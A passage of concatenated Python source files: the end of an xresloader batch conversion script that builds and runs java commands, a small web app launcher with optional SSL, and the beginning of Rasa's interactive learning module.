dest="java_options",
default=[],
)
parser.add_argument(
"-a",
"--data-version",
action="store",
help="set data version, if set it's will ignore the data_version option in convert list file",
metavar="<version>",
dest="data_version",
default=None,
)
parser.add_argument(
"convert_list_file",
nargs="+",
help="convert list file(xml) and options will be passed to xresloader.jar",
metavar="<convert list file> [-- [xresloader options...]]",
default=[],
)
options = parser.parse_args()
if options.version:
print(xconv_options["version"])
exit(0)
def print_help_msg(err_code):
parser.print_help()
exit(err_code)
if 0 == len(options.convert_list_file):
print_help_msg(-1)
xconv_options["conv_list"] = options.convert_list_file.pop(0)
xconv_options["ext_args_l2"] = options.convert_list_file
xconv_options["data_version"] = options.data_version
# ========================================= 全局配置解析 =========================================
""" 读取xml文件 """
def load_xml_file(file_path):
try:
xml_doc = ET.parse(file_path)
except ET.ParseError as ex:
print(ex)
cprintf_stderr([print_style.FC_RED], "[ERROR]: {0}" + os.linesep, ex)
exit(-2)
except EnvironmentError as ex:
print(ex)
cprintf_stderr([print_style.FC_RED], "[ERROR]: {0}" + os.linesep, ex)
exit(-2)
root_node = xml_doc.getroot()
if root_node is None:
print("[ERROR] root node not found in xml")
print_help_msg(-3)
# 枚举include文件
include_nodes = root_node.findall("./include")
if include_nodes and len(include_nodes) > 0:
dir_prefix = os.path.dirname(file_path)
for include_node in include_nodes:
include_file_path = include_node.text
if include_file_path and len(include_file_path) > 1:
if include_file_path[0] != "/" and include_file_path[1] != ":":
include_file_path = os.path.join(dir_prefix, include_file_path)
load_xml_file(include_file_path)
global_nodes = root_node.findall("./global")
if global_nodes and len(global_nodes) > 0:
for node in global_nodes:
xconv_xml_global_nodes.append({"file_path": file_path, "node": node})
list_item_nodes = root_node.findall("./list/item")
if list_item_nodes and len(list_item_nodes) > 0:
for node in list_item_nodes:
xconv_xml_list_item_nodes.append({"file_path": file_path, "node": node})
load_xml_file(xconv_options["conv_list"])
# global配置解析/合并
def load_global_options(gns):
for global_node in gns:
for global_option in global_node["node"]:
tag_name = global_option.tag.lower()
text_value = global_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
if tag_name == "work_dir":
xconv_options["work_dir"] = text_value
elif tag_name == "xresloader_path":
xconv_options["xresloader_path"] = text_value
elif tag_name == "proto":
xconv_options["args"]["-p"] = trip_value
elif tag_name == "output_type":
if (
global_node["file_path"]
!= xconv_options["output_matrix"]["file_path"]
):
xconv_options["output_matrix"]["outputs"] = []
xconv_options["output_matrix"]["file_path"] = global_node[
"file_path"
]
output_rule = {
"type": trip_value,
"rename": None,
"tags": set(),
"classes": set(),
}
rename_rule = global_option.get("rename")
if rename_rule and rename_rule.strip():
output_rule["rename"] = rename_rule
tag_rule = global_option.get("tag")
if tag_rule and tag_rule.strip():
output_rule["tags"] = set(
filter(
lambda x: x,
xconv_split_by_spaces.split(tag_rule.strip()),
)
)
class_rule = global_option.get("class")
if class_rule and class_rule.strip():
output_rule["classes"] = set(
filter(
lambda x: x,
xconv_split_by_spaces.split(class_rule.strip()),
)
)
xconv_options["output_matrix"]["outputs"].append(output_rule)
elif tag_name == "proto_file":
xconv_options["args"]["-f"] = '"' + text_value + '"'
elif tag_name == "output_dir":
xconv_options["args"]["-o"] = '"' + text_value + '"'
elif tag_name == "data_src_dir":
xconv_options["args"]["-d"] = '"' + text_value + '"'
elif tag_name == "data_version":
if xconv_options["data_version"] is None:
xconv_options["data_version"] = text_value
elif tag_name == "rename":
xconv_options["args"]["-n"] = '"' + trip_value + '"'
elif tag_name == "option":
xconv_options["ext_args_l1"].append(trip_value)
elif tag_name == "java_option":
xconv_options["java_options"].append(trip_value)
elif tag_name == "default_scheme":
if "name" in global_option.attrib:
scheme_key = global_option.attrib["name"]
if scheme_key in xconv_options["default_scheme"]:
xconv_options["default_scheme"][scheme_key].append(
trip_value
)
else:
xconv_options["default_scheme"][scheme_key] = [text_value]
else:
print("[ERROR] unknown global configure " + tag_name)
if xconv_xml_global_nodes and len(xconv_xml_global_nodes) > 0:
load_global_options(xconv_xml_global_nodes)
# ----------------------------------------- 全局配置解析 -----------------------------------------
conv_list_dir = os.path.dirname(xconv_options["conv_list"])
if conv_list_dir:
os.chdir(conv_list_dir)
os.chdir(xconv_options["work_dir"])
conv_start_msg = (
"[NOTICE] start to run conv cmds on dir: {0}" + os.linesep
).format(os.getcwd())
if sys.version_info.major >= 3:
cprintf_stdout([print_style.FC_YELLOW], conv_start_msg)
else:
conv_compat_py2_write_buffer = False
try:
cprintf_stdout(
[print_style.FC_YELLOW], conv_start_msg.decode(console_encoding)
)
except TypeError:
conv_compat_py2_write_buffer = True
cprintf_stdout([print_style.FC_YELLOW], conv_start_msg)
except EnvironmentError:
conv_compat_py2_write_buffer = True
cprintf_stdout([print_style.FC_YELLOW], conv_start_msg)
if not os.path.exists(xconv_options["xresloader_path"]):
cprintf_stderr(
[print_style.FC_RED],
"[ERROR] xresloader not found.({0}, you can download it from {1})"
+ os.linesep,
xconv_options["xresloader_path"],
"https://github.com/xresloader/xresloader/releases",
)
exit(-4)
# ========================================= 转换表配置解析 =========================================
# 转换项配置解析/合并
def load_list_item_nodes(lis):
for item_info in lis:
item = item_info["node"]
conv_item_obj = {
"file": False,
"scheme": False,
"options": [],
"enable": False,
"scheme_data": {},
"tags": set(),
"classes": set(),
}
if "file" in item.attrib:
conv_item_obj["file"] = item.attrib["file"]
if "scheme" in item.attrib:
conv_item_obj["scheme"] = item.attrib["scheme"]
if "tag" in item.attrib:
conv_item_obj["tags"] = set(
filter(lambda x: x, xconv_split_by_spaces.split(item.attrib["tag"]))
)
if "class" in item.attrib:
conv_item_obj["classes"] = set(
filter(
lambda x: x, xconv_split_by_spaces.split(item.attrib["class"])
)
)
# 局部选项
for local_option in item.findall("./option"):
text_value = local_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
conv_item_obj["options"].append(trip_value)
# 局部选项
for local_option in item.findall("./scheme"):
text_value = local_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
if "name" in local_option.attrib:
scheme_key = local_option.attrib["name"]
if scheme_key and scheme_key in conv_item_obj["scheme_data"]:
conv_item_obj["scheme_data"][scheme_key].append(text_value)
else:
conv_item_obj["scheme_data"][scheme_key] = [text_value]
for key in xconv_options["default_scheme"]:
if key not in conv_item_obj["scheme_data"]:
conv_item_obj["scheme_data"][key] = xconv_options["default_scheme"][
key
]
# 转换规则
if (
not options.rule_schemes
or 0 == len(options.rule_schemes)
or conv_item_obj["scheme"] in options.rule_schemes
):
conv_item_obj["enable"] = True
xconv_options["item"].append(conv_item_obj)
if xconv_xml_list_item_nodes and len(xconv_xml_list_item_nodes) > 0:
load_list_item_nodes(xconv_xml_list_item_nodes)
# ----------------------------------------- 转换配置解析 -----------------------------------------
# ========================================= 生成转换命令 =========================================
if not xconv_options["data_version"] is None:
xconv_options["args"]["-a"] = '"' + str(xconv_options["data_version"]) + '"'
# ++++++++++++++++++++++++++++++++++++++++++ 全局命令和配置 ++++++++++++++++++++++++++++++++++++++++++
global_cmd_args_map = xconv_options["args"].copy()
global_cmd_args_prefix_array = []
global_cmd_args_suffix_array = []
if len(xconv_options["ext_args_l1"]) > 0:
global_cmd_args_prefix_array.extend(xconv_options["ext_args_l1"])
# ++++++++++++++++++++++++++++++++++++++++++ 命令行参数 ++++++++++++++++++++++++++++++++++++++++++
if len(xconv_options["ext_args_l2"]) > 0:
global_cmd_args_suffix_array.extend(xconv_options["ext_args_l2"])
cmd_list = []
for conv_item in xconv_options["item"]:
if not conv_item["enable"]:
continue
item_output_matrix = xconv_options["output_matrix"]["outputs"]
if not item_output_matrix:
item_output_matrix = [{}]
for item_output in item_output_matrix:
item_cmd_args_array = []
# merge global options
item_cmd_args_map = global_cmd_args_map.copy()
if "type" in item_output and item_output["type"]:
item_cmd_args_map["-t"] = item_output["type"]
if "rename" in item_output and item_output["rename"]:
item_cmd_args_map["-n"] = '"{0}"'.format(item_output["rename"])
if "tags" in item_output and item_output["tags"]:
check_limit = False
for tag in item_output["tags"]:
if tag in conv_item["tags"]:
check_limit = True
break
if not check_limit:
continue
if "classes" in item_output and item_output["classes"]:
check_limit = False
for tag in item_output["classes"]:
if tag in conv_item["classes"]:
check_limit = True
break
if not check_limit:
continue
for key in item_cmd_args_map:
item_cmd_args_array.append(key)
item_cmd_args_array.append(item_cmd_args_map[key])
# add item options
item_cmd_args_array.extend(conv_item["options"])
if len(conv_item["options"]) > 0:
item_cmd_args_array.extend(conv_item["options"])
# add item scheme
if conv_item["file"] and conv_item["scheme"]:
item_cmd_args_array.append("-s")
item_cmd_args_array.append('"{:s}"'.format(conv_item["file"]))
item_cmd_args_array.append("-m")
item_cmd_args_array.append('"{:s}"'.format(conv_item["scheme"]))
else:
for key in conv_item["scheme_data"]:
for opt_val in conv_item["scheme_data"][key]:
item_cmd_args_array.append("-m")
item_cmd_args_array.append('"{:s}={:s}"'.format(key, opt_val))
item_cmd_args_array.extend(global_cmd_args_suffix_array)
cmd_list.append(item_cmd_args_array)
cmd_list.reverse()
# ----------------------------------------- 生成转换命令 -----------------------------------------
all_worker_thread = []
cmd_picker_lock = threading.Lock()
def print_buffer_to_fd(fd, buffer):
if sys.version_info.major >= 3:
fd.write(buffer.decode(java_encoding))
else:
if console_encoding == java_encoding or conv_compat_py2_write_buffer:
sys.stderr.write(buffer)
else:
sys.stderr.write(buffer.decode(java_encoding))
def print_stdout_func(pexec):
for output_line in pexec.stdout.readlines():
print_buffer_to_fd(sys.stdout, output_line)
def print_stderr_func(pexec):
for output_line in pexec.stderr.readlines():
print_buffer_to_fd(sys.stderr, output_line)
def worker_func(idx):
global exit_code
java_options = ["java"]
if len(options.java_options) > 0:
for java_option in options.java_options:
java_options.append("-{0}".format(java_option))
if len(xconv_options["java_options"]) > 0:
for java_option in xconv_options["java_options"]:
java_options.append(java_option)
java_options.append("-Dfile.encoding={0}".format(java_encoding))
java_options.append("-jar")
java_options.append(xconv_options["xresloader_path"])
java_options.append("--stdin")
once_pick_count = len(xconv_options["output_matrix"]["outputs"])
if once_pick_count <= 1:
once_pick_count = 1
pexec = None
if not options.test:
pexec = Popen(
java_options, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=False
)
worker_thd_print_stdout = threading.Thread(
target=print_stdout_func, args=[pexec]
)
worker_thd_print_stderr = threading.Thread(
target=print_stderr_func, args=[pexec]
)
worker_thd_print_stdout.start()
worker_thd_print_stderr.start()
while True:
cmd_picker_lock.acquire()
if len(cmd_list) <= 0:
cmd_picker_lock.release()
break
for _ in range(0, once_pick_count):
if not cmd_list:
break
pexec.stdin.write(" ".join(cmd_list.pop()).encode(java_encoding))
pexec.stdin.write(os.linesep.encode(java_encoding))
cmd_picker_lock.release()
pexec.stdin.flush()
pexec.stdin.close()
for output_line in pexec.stdout.readlines():
print(output_line.decode(java_encoding))
cmd_exit_code = pexec.wait()
worker_thd_print_stdout.join()
worker_thd_print_stderr.join()
exit_code = exit_code + cmd_exit_code
else:
this_thd_cmds = []
while True:
cmd_picker_lock.acquire()
if len(cmd_list) <= 0:
cmd_picker_lock.release()
break
for _ in range(0, once_pick_count):
if not cmd_list:
break
# python2 must use encode string to bytes or there will be messy code
# python3 must not use encode methed because it will transform string to bytes
if sys.version_info.major < 3 and not conv_compat_py2_write_buffer:
this_thd_cmds.append(
" ".join(cmd_list.pop()).encode(console_encoding)
)
else:
this_thd_cmds.append(" ".join(cmd_list.pop()))
cmd_picker_lock.release()
cprintf_stdout(
[print_style.FC_GREEN],
('"{0}"' + os.linesep + "\t>{1}" + os.linesep).format(
'" "'.join(java_options), (os.linesep + "\t>").join(this_thd_cmds)
),
)
for i in range(0, options.parallelism):
this_worker_thd = threading.Thread(target=worker_func, args=[i])
this_worker_thd.start()
all_worker_thread.append(this_worker_thd)
# 等待退出
for thd in all_worker_thread:
thd.join()
# ----------------------------------------- 实际开始转换 -----------------------------------------
cprintf_stdout(
[print_style.FC_MAGENTA],
"[INFO] all jobs done. {0} job(s) failed.{1}".format(exit_code, os.linesep),
)
if __name__ == "__main__":
main()
exit(exit_code)
|
main.py
|
import threading
from __init__ import app, configuration
import database.database_connection as database
if database.connect_if_required():
database.database_engine.init_app(app)
database.database_engine.create_all()
def run_schedulers():
import time
import schedule
from server_settings.shutdown_scheduler import set_shutdown_time
set_shutdown_time()
while True:
schedule.run_pending()
time.sleep(1)
threading.Thread(target=run_schedulers, daemon=True).start()
if __name__ == '__main__':
if configuration.web_ssl:
app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port, ssl_context=(configuration.ssl_cert_file, configuration.ssl_key_file))
else:
app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port)
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import (
ACTION_LISTEN_NAME,
default_action_names,
UTTER_PREFIX,
)
from rasa.core.channels.channel import UserMessage
from rasa.core.channels.channel import button_to_string, element_to_string
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.structures import Story
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
from rasa.utils.io import create_path
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {
"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml",
}
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
NEW_TEMPLATES = {}
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
sender_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"text": message,
"parse_data": parse_data,
}
return await endpoint.request(
json=payload,
method="post",
subpath="/conversations/{}/messages".format(sender_id),
)
async def request_prediction(
endpoint: EndpointConfig, sender_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(
method="post", subpath="/conversations/{}/predict".format(sender_id)
)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(
method="get", subpath="/domain", headers={"Accept": "application/json"}
)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
sender_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = "/conversations/{}/tracker?include_events={}".format(
sender_id, verbosity.name
)
return await endpoint.request(
method="get", subpath=path, headers={"Accept": "application/json"}
)
async def send_action(
endpoint: EndpointConfig,
sender_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False,
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = "/conversations/{}/execute".format(sender_id)
try:
return await endpoint.request(json=payload, method="post", subpath=subpath)
except ClientError:
if is_new_action:
if action_name in NEW_TEMPLATES:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{0}', "
"with matching template: '{1}'. "
"This action will not return its message in this session, "
"but the new utterance will be saved to your domain file "
"when you exit and save this session. "
"You do not need to do anything further. "
"".format(action_name, [*NEW_TEMPLATES[action_name]][0])
)
await _ask_questions(warning_questions, sender_id, endpoint)
else:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"which was not successfully executed. "
"If this action does not return any events, "
"you do not need to do anything. "
"If this is a custom action which returns events, "
"you are recommended to implement this action "
"in your action server and try again."
"".format(action_name)
)
await _ask_questions(warning_questions, sender_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, sender_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
sender_id: Text,
evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = "/conversations/{}/tracker/events".format(sender_id)
return await endpoint.request(json=evt, method="post", subpath=subpath)
def format_bot_output(message: BotUttered) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.text or ""
# Then, append all additional items
data = message.data or {}
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
for idx, button in enumerate(data.get("buttons")):
button_str = button_to_string(button, idx)
output += "\n" + button_str
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return events[: -(i + 1)]
return events
async def _ask_questions(
questions: Union[Form, Question],
sender_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(sender_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(
p.get("confidence"), p.get("name")
)
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
async def _request_free_text_intent(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text("Please type the intent name:")
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_action(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text("Please type the action name:")
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_utterance(
sender_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
question = questionary.text(
"Please type the message for your new utter_template '{}':".format(action)
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_selection_from_intents(
intents: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intents)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?", choices=forks
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_from_user(
sender_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means, the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(
list(reversed(choices)), sender_id, endpoint
)
if fork_idx is not None:
return tracker.get("events", [])[: int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message, intents, sender_id, endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = [
{"name": "<create_new_intent>", "value": OTHER_INTENT}
] + _selection_choices_from_intent_prediction(predictions)
intent_name = await _request_selection_from_intents(choices, sender_id, endpoint)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(sender_id, endpoint)
selected_intent = {"name": intent_name, "confidence": 1.0}
else:
# returns the selected intent with the original probability value
selected_intent = next(
(x for x in predictions if x["name"] == intent_name), {"name": None}
)
return selected_intent
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
table = _chat_history_table(events)
slot_strs = _slot_history(tracker_dump)
print ("------")
print ("Chat History\n")
print (table)
if slot_strs:
print ("\n")
print ("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
print ("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt: Text, max_width: int) -> Text:
return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
def colored(txt: Text, color: Text) -> Text:
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
intent = user_event.intent or {}
intent_name = intent.get("name", "")
_confidence = intent.get("confidence", 1.0)
_md = _as_md_message(user_event.parse_data)
_lines = [
colored(wrap(_md, max_width), "hired"),
"intent: {} {:03.2f}".format(intent_name, _confidence),
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
[
"# ",
Color(colored("Bot ", "autoblue")),
" ",
Color(colored("You ", "hired")),
]
]
table = SingleTable(table_data, "Chat History")
bot_column = []
tracker = DialogueStateTracker.from_dict("any", events)
applied_events = tracker.applied_events()
for idx, event in enumerate(applied_events):
if isinstance(event, ActionExecuted):
bot_column.append(colored(event.action_name, "autocyan"))
if event.confidence is not None:
bot_column[-1] += colored(
" {:03.2f}".format(event.confidence), "autowhite"
)
elif isinstance(event, UserUttered):
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(event, user_width(table))
add_user_cell(table_data, msg)
elif isinstance(event, BotUttered):
wrapped = wrap(format_bot_output(event), bot_width(table))
bot_column.append(colored(wrapped, "autoblue"))
else:
if event.as_story_string():
bot_column.append(wrap(event.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cliutils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strs.append("{}: {}".format(k, colored_value))
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
await _write_stories_to_file(story_path, events)
await _write_nlu_to_file(nlu_path, events)
await _write_domain_to_file(domain_path, events, endpoint)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[
Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit"),
],
).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(sender_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]], sender_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(sender_id, endpoint)
choices = [
{
"name": "{:03.2f} {:40}".format(a.get("score"), a.get("action")),
"value": a.get("action"),
}
for a in predictions
]
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
session_actions_all = [a["name"] for a in _collect_actions(events)]
session_actions_unique = list(set(session_actions_all))
old_actions = [action["value"] for action in choices]
new_actions = [
{"name": action, "value": OTHER_ACTION + action}
for action in session_actions_unique
if action not in old_actions
]
choices = (
[{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
)
question = questionary.select("What is the next action of the bot?", choices)
action_name = await _ask_questions(question, sender_id, endpoint)
is_new_action = action_name == NEW_ACTION
if is_new_action:
# create new action
action_name = await _request_free_text_action(sender_id, endpoint)
if action_name.startswith(UTTER_PREFIX):
utter_message = await _request_free_text_utterance(
sender_id, endpoint, action_name
)
NEW_TEMPLATES[action_name] = {utter_message: ""}
elif action_name[:32] == OTHER_ACTION:
# action was newly created in the session, but not this turn
is_new_action = True
action_name = action_name[32:]
print ("Thanks! The bot will now run {}.\n".format(action_name))
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"],
),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"],
),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"],
),
)
answers = questions.ask()
if not answers:
raise Abort()
return (answers["export_stories"], answers["export_nlu"], answers["export_domain"])
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
from rasa.nlu.extractors.duckling_http_extractor import DucklingHTTPExtractor
from rasa.nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
from rasa.nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
msgs = []
for event in events:
if event.get("event") == UserUttered.type_name:
data = event.get("parse_data", {})
for entity in data.get("entities", []):
excluded_extractors = [
DucklingHTTPExtractor.__name__,
SpacyEntityExtractor.__name__,
MitieEntityExtractor.__name__,
]
logger.debug(
"Exclude entity marking of following extractors"
" {} when writing nlu data "
"to file.".format(excluded_extractors)
)
if entity.get("extractor") in excluded_extractors:
data["entities"].remove(entity)
msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
msgs.append(msg)
return msgs
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt for evt in events if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the conversation of the sender_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(events)
create_path(export_story_path)
if os.path.exists(export_story_path):
append_write = "a" # append if already exists
else:
append_write = "w" # make a new file if not
with open(export_story_path, append_write, encoding="utf-8") as f:
for conversation in sub_conversations:
parsed_events = rasa.core.events.deserialise_events(conversation)
